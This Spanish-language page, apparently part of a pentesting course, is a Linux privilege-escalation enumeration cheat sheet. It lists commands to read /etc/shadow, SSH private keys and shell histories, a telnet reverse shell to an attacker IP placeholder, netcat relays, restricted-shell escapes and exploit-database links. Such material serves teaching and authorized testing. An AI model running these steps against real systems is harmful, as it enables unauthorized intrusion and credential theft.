Comprar curso YouTube Twitter LinkedIn

Enumeracion de Linux

La enumeración es clave. La escalación de privilegios en Linux se trata de:

  • Recopilar: Enumeración, más enumeración y aún más enumeración.

  • Procesar: Ordenar los datos, analizar y priorizar.

  • Buscar: Saber qué buscar y dónde encontrar el código de exploit.

  • Adaptar: Personalizar el exploit para que encaje. No todos los exploits funcionan para cada sistema "tal cual".

  • Intentar: Prepárate para (muchos) ensayos y errores.

Sistema Operativo ¿Cuál es el tipo de distribución? ¿Qué versión es?

  • cat /etc/issue

  • cat /etc/*-release

  • cat /etc/lsb-release

  • cat /etc/redhat-release

¿Cuál es la versión del Kernel? ¿Es de 64 bits?

  • cat /proc/version

  • uname -a

  • uname -mrs

  • rpm -q kernel

  • dmesg | grep Linux

  • ls /boot | grep vmlinuz-

¿Qué se puede aprender de las variables de entorno?

  • cat /etc/profile

  • cat /etc/bashrc

  • cat ~/.bash_profile

  • cat ~/.bashrc

  • cat ~/.bash_logout

  • env

  • set

¿Hay una impresora?

  • lpstat -a

Aplicaciones y Servicios ¿Qué servicios están corriendo? ¿Qué servicio tiene qué privilegios de usuario?

  • ps aux

  • ps -ef

  • top

  • cat /etc/service

¿Qué servicios están siendo ejecutados por root? De estos servicios, ¿cuáles son vulnerables? ¡Vale la pena verificarlo dos veces!

  • ps aux | grep root

  • ps -ef | grep root

¿Qué aplicaciones están instaladas? ¿Qué versión tienen? ¿Están corriendo actualmente?

  • ls -alh /usr/bin/

  • ls -alh /sbin/

  • dpkg -l

  • rpm -qa

  • ls -alh /var/cache/apt/archives

  • ls -alh /var/cache/yum/

¿Alguna configuración de servicio está mal configurada? ¿Algún plugin (vulnerable) está adjunto?

  • cat /etc/syslog.conf

  • cat /etc/chttp.conf

  • cat /etc/lighttpd.conf

  • cat /etc/cups/cupsd.conf

  • cat /etc/inetd.conf

  • cat /etc/apache2/apache2.conf

  • cat /etc/my.conf

  • cat /etc/httpd/conf/httpd.conf

  • cat /opt/lampp/etc/httpd.conf

  • ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

¿Qué trabajos están programados?

  • crontab -l

  • ls -alh /var/spool/cron

  • ls -al /etc/ | grep cron

  • ls -al /etc/cron*

  • cat /etc/cron*

  • cat /etc/at.allow

  • cat /etc/at.deny

  • cat /etc/cron.allow

  • cat /etc/cron.deny

  • cat /etc/crontab

  • cat /etc/anacrontab

  • cat /var/spool/cron/crontabs/root

¿Hay nombres de usuario y/o contraseñas en texto plano?

  • grep -i user [filename]

  • grep -i pass [filename]

  • grep -C 5 "password" [filename]

  • find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Comunicaciones y Redes ¿Qué NIC(s) tiene el sistema? ¿Está conectado a otra red?

  • /sbin/ifconfig -a

  • cat /etc/network/interfaces

  • cat /etc/sysconfig/network

¿Cuáles son las configuraciones de red? ¿Qué se puede encontrar sobre esta red? ¿Servidor DHCP? ¿Servidor DNS? ¿Puerta de enlace?

  • cat /etc/resolv.conf

  • cat /etc/sysconfig/network

  • cat /etc/networks

  • iptables -L

  • hostname

  • dnsdomainname

¿Qué otros usuarios y hosts están comunicándose con el sistema?

  • lsof -i

  • lsof -i :80

  • grep 80 /etc/services

  • netstat -antup

  • netstat -antpx

  • netstat -tulpn

  • chkconfig --list

  • chkconfig --list | grep 3:on

  • last

  • w

¿Qué está en caché? ¿Direcciones IP y/o MAC?

  • arp -e

  • route

  • /sbin/route -nee

¿Es posible hacer sniffing de paquetes? ¿Qué se puede ver? Escuchar tráfico en vivo

  • tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

  • tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

¿Tienes una shell? ¿Puedes interactuar con el sistema?

  • nc -lvp 4444 # Atacante. Entrada (Comandos)

  • nc -lvp 4445 # Atacante. Salida (Resultados)

  • telnet [ip del atacante] 44444 | /bin/sh | [ip local] 44445 # En el sistema de la víctima. Usa la IP del atacante!

¿Es posible hacer port forwarding? Redirigir e interactuar con el tráfico desde otra vista

  • FPipe.exe -l [puerto local] -r [puerto remoto] -s [puerto local] [IP local]

  • FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

  • ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Puerto Local

  • ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Puerto Remoto

  • mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Relé de Puertos

  • mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Puerto 80 a 8080)

  • mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Monitor de Proxy (Puerto 80 a 8080)

¿Es posible hacer túneles? Enviar comandos localmente, remotamente

  • ssh -D 127.0.0.1:9050 -N [usuario]@[ip]

  • proxychains ifconfig

Información Confidencial y Usuarios ¿Quién eres? ¿Quién está conectado? ¿Quién ha estado conectado? ¿Quién más está allí? ¿Quién puede hacer qué?

  • id

  • who

  • w

  • last

  • cat /etc/passwd | cut -d: # Lista de usuarios

  • grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # Lista de superusuarios

  • awk -F: '($3 == "0") {print}' /etc/passwd # Lista de superusuarios

  • cat /etc/sudoers

  • sudo -l

¿Qué archivos sensibles se pueden encontrar?

  • cat /etc/passwd

  • cat /etc/group

  • cat /etc/shadow

  • ls -alh /var/mail/

¿Hay algo "interesante" en los directorios de inicio? Si es posible acceder

  • ls -ahlR /root/

  • ls -ahlR /home/

¿Hay contraseñas en scripts, bases de datos, archivos de configuración o archivos de log? Rutas y ubicaciones predeterminadas para contraseñas

  • cat /var/apache2/config.inc

  • cat /var/lib/mysql/mysql/user.MYD

  • cat /root/anaconda-ks.cfg

¿Qué ha estado haciendo el usuario? ¿Hay alguna contraseña en texto plano? ¿Qué han estado editando?

  • cat ~/.bash_history

  • cat ~/.nano_history

  • cat ~/.atftp_history

  • cat ~/.mysql_history

  • cat ~/.php_history

¿Qué información de usuario se puede encontrar?

  • cat ~/.bashrc

  • cat ~/.profile

  • cat /var/mail/root

  • cat /var/spool/mail/root

¿Se puede encontrar información de clave privada?

  • cat ~/.ssh/authorized_keys

  • cat ~/.ssh/identity.pub

  • cat ~/.ssh/identity

  • cat ~/.ssh/id_rsa.pub

  • cat ~/.ssh/id_rsa

  • cat ~/.ssh/id_dsa.pub

  • cat ~/.ssh/id_dsa

  • cat /etc/ssh/ssh_config

  • cat /etc/ssh/sshd_config

  • cat /etc/ssh/ssh_host_dsa_key.pub

  • cat /etc/ssh/ssh_host_dsa_key

  • cat /etc/ssh/ssh_host_rsa_key.pub

  • cat /etc/ssh/ssh_host_rsa_key

  • cat /etc/ssh/ssh_host_key.pub

  • cat /etc/ssh/ssh_host_key

Sistemas de Archivos ¿Qué archivos de configuración se pueden escribir en /etc/? ¿Es posible reconfigurar un servicio?

  • ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Cualquiera

  • ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Propietario

  • ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Grupo

  • ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Otros

  • find /etc/ -readable -type f 2>/dev/null # Cualquiera

  • find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Cualquiera

¿Qué se puede encontrar en /var/?

  • ls -alh /var/log

  • ls -alh /var/mail

  • ls -alh /var/spool

  • ls -alh /var/spool/lpd

  • ls -alh /var/lib/pgsql

  • ls -alh /var/lib/mysql

  • cat /var/lib/dhcp3/dhclient.leases

¿Hay algún ajuste/archivo (oculto) en el sitio web? ¿Algún archivo de configuración con información de base de datos?

  • ls -alhR /var/www/

  • ls -alhR /srv/www/htdocs/

  • ls -alhR /usr/local/www/apache22/data/

  • ls -alhR /opt/lampp/htdocs/

  • ls -alhR /var/www/html/

¿Hay algo en el(los) archivo(s) de log? (¡Podría ayudar con "Inclusión de Archivos Locales"!)

  • cat /etc/httpd/logs/access_log

  • cat /etc/httpd/logs/access.log

  • cat /etc/httpd/logs/error_log

  • cat /etc/httpd/logs/error.log

  • cat /var/log/apache2/access_log

  • cat /var/log/apache2/access.log

  • cat /var/log/apache2/error_log

  • cat /var/log/apache2/error.log

  • cat /var/log/apache/access_log

  • cat /var/log/apache/access.log

  • cat /var/log/auth.log

  • cat /var/log/chttp.log

  • cat /var/log/cups/error_log

  • cat /var/log/dpkg.log

  • cat /var/log/faillog

  • cat /var/log/httpd/access_log

  • cat /var/log/httpd/access.log

  • cat /var/log/httpd/error_log

  • cat /var/log/httpd/error.log

  • cat /var/log/lastlog

  • cat /var/log/lighttpd/access.log

  • cat /var/log/lighttpd/error.log

  • cat /var/log/lighttpd/lighttpd.access.log

  • cat /var/log/lighttpd/lighttpd.error.log

  • cat /var/log/messages

  • cat /var/log/secure

  • cat /var/log/syslog

  • cat /var/log/wtmp

  • cat /var/log/xferlog

  • cat /var/log/yum.log

  • cat /var/run/utmp

  • cat /var/webmin/miniserv.log

  • cat /var/www/logs/access_log

  • cat /var/www/logs/access.log

  • ls -alh /var/lib/dhcp3/

  • ls -alh /var/log/postgresql/

  • ls -alh /var/log/proftpd/

  • ls -alh /var/log/samba/

  • cat /var/log/auth.log

  • cat /var/log/boot

  • cat /var/log/btmp

  • cat /var/log/daemon.log

  • cat /var/log/debug

  • cat /var/log/dmesg

  • cat /var/log/kern.log

  • cat /var/log/mail.info

  • cat /var/log/mail.log

  • cat /var/log/mail.warn

  • cat /var/log/messages

  • cat /var/log/syslog

  • cat /var/log/udev

  • cat /var/log/wtmp

Si los comandos están limitados, ¿puedes salir de la "Shell TTY"?

  • python -c 'import pty;pty.spawn("/bin/bash")'

  • echo os.system('/bin/bash')

  • /bin/sh -i

¿Cómo están montados los sistemas de archivos?

  • mount

  • df -h

¿Hay sistemas de archivos no montados?

  • cat /etc/fstab

¿Qué "Permisos Avanzados de Archivos en Linux" se están usando? Sticky bits, SUID y GUID

  • find / -perm -1000 -type d 2>/dev/null # Sticky bit - Solo el propietario del directorio o el propietario de un archivo puede eliminar o renombrar aquí.

  • find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - Ejecutar como el grupo, no como el usuario que lo inició.

  • find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - Ejecutar como el propietario, no como el usuario que lo inició.

  • find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID o SUID

  • find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # Encontrar empezando desde root (/), SGID o SUID, no enlaces simbólicos, solo 3 carpetas de profundidad, listar con más detalles y ocultar cualquier error (por ejemplo, permiso denegado).

¿Dónde se puede escribir y ejecutar? Algunos lugares 'comunes': /tmp, /var/tmp, /dev/shm

  • find / -writable -type d 2>/dev/null # Directorios con permisos de escritura para todos

  • find / -perm -222 -type d 2>/dev/null # Directorios con permisos de escritura para todos

  • find / -perm -o+w -type d 2>/dev/null # Directorios con permisos de escritura para todos

  • find / -perm -o+x -type d 2>/dev/null # Directorios con permisos de ejecución para todos

  • find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # Directorios con permisos de escritura y ejecución para todos

¿Algún archivo "problemático"? Archivos con permisos de escritura para todos, archivos "nobody"

  • find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # Archivos con permisos de escritura para todos

  • find /dir -xdev \( -nouser -o -nogroup \) -print # Archivos sin propietario

Preparación y Búsqueda de Código de Explotación ¿Qué herramientas/lenguajes de desarrollo están instalados/soportados?

  • find / -name perl*

  • find / -name python*

  • find / -name gcc*

  • find / -name cc

¿Cómo se pueden subir archivos?

  • find / -name wget

  • find / -name nc*

  • find / -name netcat*

  • find / -name tftp*

  • find / -name ftp

Encontrar código de exploit

  • http://www.exploit-db.com

  • http://1337day.com

  • http://www.securiteam.com

  • http://www.securityfocus.com

  • http://www.exploitsearch.net

  • http://metasploit.com/modules/

  • http://securityreason.com

  • http://seclists.org/fulldisclosure/

  • http://www.google.com

Encontrar más información sobre el exploit

  • http://www.cvedetails.com

  • http://packetstormsecurity.org/files/cve/[CVE]

  • http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

  • http://www.vulnview.com/cve-details.php?cvename=[CVE]

AnteriorEnumeracion de WindowsSiguiente¿Que es la escalacion de privilegios?

Última actualización